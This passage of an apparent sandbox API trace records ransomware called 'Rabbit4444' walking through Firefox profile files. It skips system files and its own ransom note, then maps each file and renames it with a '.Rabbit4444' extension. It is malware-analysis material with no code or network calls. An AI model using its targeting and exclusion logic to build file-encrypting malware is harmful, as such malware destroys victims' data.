(lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4.rabbit4444"), dwFlags=0x1) returned 1 [0052.201] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x147ab83f, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x147ab83f, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x147acbbc, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x1959, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", cAlternateFileName="150478~2.JSO")) returned 1 [0052.201] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.201] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.201] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="Rabbit4444.exe") returned -1 [0052.201] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2=".") returned 1 [0052.201] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="..") returned 1 [0052.201] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="windows") returned -1 [0052.202] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="bootmgr") returned -1 [0052.202] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="pagefile.sys") returned -1 [0052.202] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="boot") returned -1 [0052.202] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="ids.txt") returned -1 [0052.202] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="NTUSER.DAT") returned -1 [0052.202] lstrcpyW (in: lpString1=0x130ec0a, lpString2="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4" | out: lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4") returned="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4" [0052.202] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", dwFileAttributes=0x0) returned 1 [0052.202] lstrlenW (lpString="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4") returned 63 [0052.202] lstrlenW (lpString="Rabbit4444") returned 10 [0052.202] lstrcmpiW (lpString1="in.jsonlz4", lpString2="Rabbit4444") returned -1 [0052.202] lstrlenW (lpString=".dll") returned 4 [0052.202] lstrcmpiW (lpString1="nlz4", lpString2=".dll") returned 1 [0052.202] lstrlenW (lpString=".lnk") returned 4 [0052.202] lstrcmpiW (lpString1="nlz4", lpString2=".lnk") returned 1 [0052.202] lstrlenW (lpString=".ini") returned 4 [0052.202] lstrcmpiW (lpString1="nlz4", lpString2=".ini") returned 1 [0052.202] lstrlenW (lpString=".sys") returned 4 [0052.202] lstrcmpiW (lpString1="nlz4", lpString2=".sys") returned 1 [0052.203] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.203] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.203] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14351348507) returned 1 [0052.203] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=6489) returned 1 [0052.203] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0052.203] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0052.203] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1c60, lpName=0x0) returned 0x298 [0052.204] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c60) returned 0x70000 [0052.206] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.206] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0052.206] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.206] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0052.206] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.206] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0052.206] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.206] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0052.206] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14351715463) returned 1 [0052.206] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0052.206] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0052.207] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.207] CloseHandle (hObject=0x298) returned 1 [0052.207] CloseHandle (hObject=0x278) returned 1 [0052.207] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4.Rabbit4444") returned 179 [0052.207] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4.rabbit4444"), dwFlags=0x1) returned 1 [0052.207] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4853f871, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4853f871, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x48566a5e, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x173b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", cAlternateFileName="150478~3.JSO")) returned 1 [0052.207] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.207] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.207] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="Rabbit4444.exe") returned -1 [0052.207] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2=".") returned 1 [0052.208] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="..") returned 1 [0052.208] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="windows") returned -1 [0052.208] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="bootmgr") returned -1 [0052.208] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="pagefile.sys") returned -1 [0052.208] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="boot") returned -1 [0052.208] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="ids.txt") returned -1 [0052.208] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="NTUSER.DAT") returned -1 [0052.208] lstrcpyW (in: lpString1=0x130ec0a, lpString2="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4" | out: lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4") returned="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4" [0052.208] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", dwFileAttributes=0x0) returned 1 [0052.208] lstrlenW (lpString="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4") returned 63 [0052.208] lstrlenW (lpString="Rabbit4444") returned 10 [0052.208] lstrcmpiW (lpString1="in.jsonlz4", lpString2="Rabbit4444") returned -1 [0052.208] lstrlenW (lpString=".dll") returned 4 [0052.208] lstrcmpiW (lpString1="nlz4", lpString2=".dll") returned 1 [0052.208] lstrlenW (lpString=".lnk") returned 4 [0052.208] lstrcmpiW (lpString1="nlz4", lpString2=".lnk") returned 1 [0052.208] lstrlenW (lpString=".ini") returned 4 [0052.208] lstrcmpiW (lpString1="nlz4", lpString2=".ini") returned 1 [0052.208] lstrlenW (lpString=".sys") returned 4 [0052.208] lstrcmpiW (lpString1="nlz4", lpString2=".sys") returned 1 [0052.208] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.208] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.208] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14351921193) returned 1 [0052.209] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5947) returned 1 [0052.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0052.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0052.209] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a40, lpName=0x0) returned 0x298 [0052.210] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a40) returned 0x70000 [0052.210] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.211] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0052.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.211] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0052.211] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0052.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0052.211] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14352171734) returned 1 [0052.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0052.211] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0052.211] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.211] CloseHandle (hObject=0x298) returned 1 [0052.211] CloseHandle (hObject=0x278) returned 1 [0052.211] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4.Rabbit4444") returned 179 [0052.211] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4.rabbit4444"), dwFlags=0x1) returned 1 [0052.215] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdd249bf, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xcdd249bf, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xcdd249bf, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x198a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", cAlternateFileName="150478~4.JSO")) returned 1 [0052.215] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.215] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.215] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="Rabbit4444.exe") returned -1 [0052.215] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2=".") returned 1 [0052.215] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="..") returned 1 [0052.215] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="windows") returned -1 [0052.215] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="bootmgr") returned -1 [0052.216] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="pagefile.sys") returned -1 [0052.216] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="boot") returned -1 [0052.216] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="ids.txt") returned -1 [0052.216] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="NTUSER.DAT") returned -1 [0052.216] lstrcpyW (in: lpString1=0x130ec0a, lpString2="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4" | out: lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4") returned="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4" [0052.216] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", dwFileAttributes=0x0) returned 1 [0052.216] lstrlenW (lpString="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4") returned 63 [0052.216] lstrlenW (lpString="Rabbit4444") returned 10 [0052.216] lstrcmpiW (lpString1="in.jsonlz4", lpString2="Rabbit4444") returned -1 [0052.216] lstrlenW (lpString=".dll") returned 4 [0052.217] lstrcmpiW (lpString1="nlz4", lpString2=".dll") returned 1 [0052.217] lstrlenW (lpString=".lnk") returned 4 [0052.217] lstrcmpiW (lpString1="nlz4", lpString2=".lnk") returned 1 [0052.217] lstrlenW (lpString=".ini") returned 4 [0052.217] lstrcmpiW (lpString1="nlz4", lpString2=".ini") returned 1 [0052.217] lstrlenW (lpString=".sys") returned 4 [0052.217] lstrcmpiW (lpString1="nlz4", lpString2=".sys") returned 1 [0052.217] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.217] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.217] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14352766383) returned 1 [0052.217] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=6538) returned 1 [0052.217] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0052.217] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0052.217] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1c90, lpName=0x0) returned 0x298 [0052.220] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c90) returned 0x70000 [0052.221] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.221] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0052.221] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.221] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0052.221] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.221] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0052.221] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.221] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0052.221] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14353193501) returned 1 [0052.221] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0052.221] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0052.221] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.221] CloseHandle (hObject=0x298) returned 1 [0052.221] CloseHandle (hObject=0x278) returned 1 [0052.222] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4.Rabbit4444") returned 179 [0052.222] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4.rabbit4444"), dwFlags=0x1) returned 1 [0052.222] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8403501, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8403501, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1a68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", cAlternateFileName="15CA1A~1.JSO")) returned 1 [0052.222] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.222] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.222] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="Rabbit4444.exe") returned -1 [0052.222] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2=".") returned 1 [0052.222] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="..") returned 1 [0052.222] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="windows") returned -1 [0052.223] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="bootmgr") returned -1 [0052.223] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="pagefile.sys") returned -1 [0052.223] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="boot") returned -1 [0052.223] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="ids.txt") returned -1 [0052.223] lstrcmpiW (lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", lpString2="NTUSER.DAT") returned -1 [0052.223] lstrcpyW (in: lpString1=0x130ec0a, lpString2="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4" | out: lpString1="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4") returned="1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4" [0052.223] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783834184.9f6a97f1-211a-4a0b-bad3-33fe96259e66.main.jsonlz4", dwFileAttributes=0x0) returned 1 [0052.223] lstrlenW 